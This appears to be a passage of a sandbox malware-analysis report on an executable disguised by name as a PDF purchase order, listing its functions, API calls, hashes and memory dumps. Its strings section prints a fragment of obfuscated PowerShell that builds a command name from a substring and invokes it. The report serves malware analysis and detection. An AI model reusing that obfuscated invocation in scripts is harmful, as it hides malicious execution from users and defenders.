Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
RegCloseKey.ADVAPI32(00000000), ref: 004022FB

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A

Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405275

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

OleUninitialize.OLE32(00000404,00000000), ref: 004052C1

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A

Function 00404179 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D

Function 00404162 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

Function 0040330D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

Function 0040414F Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

N, xrefs: 00404D99
M, xrefs: 00404CB8
, xrefs: 004050C7

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 05935c29ea04aee5657b6778d98d1933a7035246dab6fdb79b38fb6bca2f1c75
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 004045C8 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404617
SetWindowTextW.USER32(00000000,?), ref: 00404641
SHBrowseForFolderW.SHELL32(?), ref: 004046F2
CoTaskMemFree.OLE32(00000000), ref: 004046FD
lstrcmpiW.KERNEL32(: Completed,004226D0,00000000,?,?), ref: 0040472F
lstrcatW.KERNEL32(?,: Completed), ref: 0040473B
SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D

Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\LPO-9180155-PDF.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF

Strings

';$Attributnavn=$Fingereringerne.SubString(75282,3);.$Attributnavn($Fingereringerne) ", xrefs: 004045E1
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00404718
A, xrefs: 004046EB
: Completed, xrefs: 00404729, 0040472E, 00404739

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
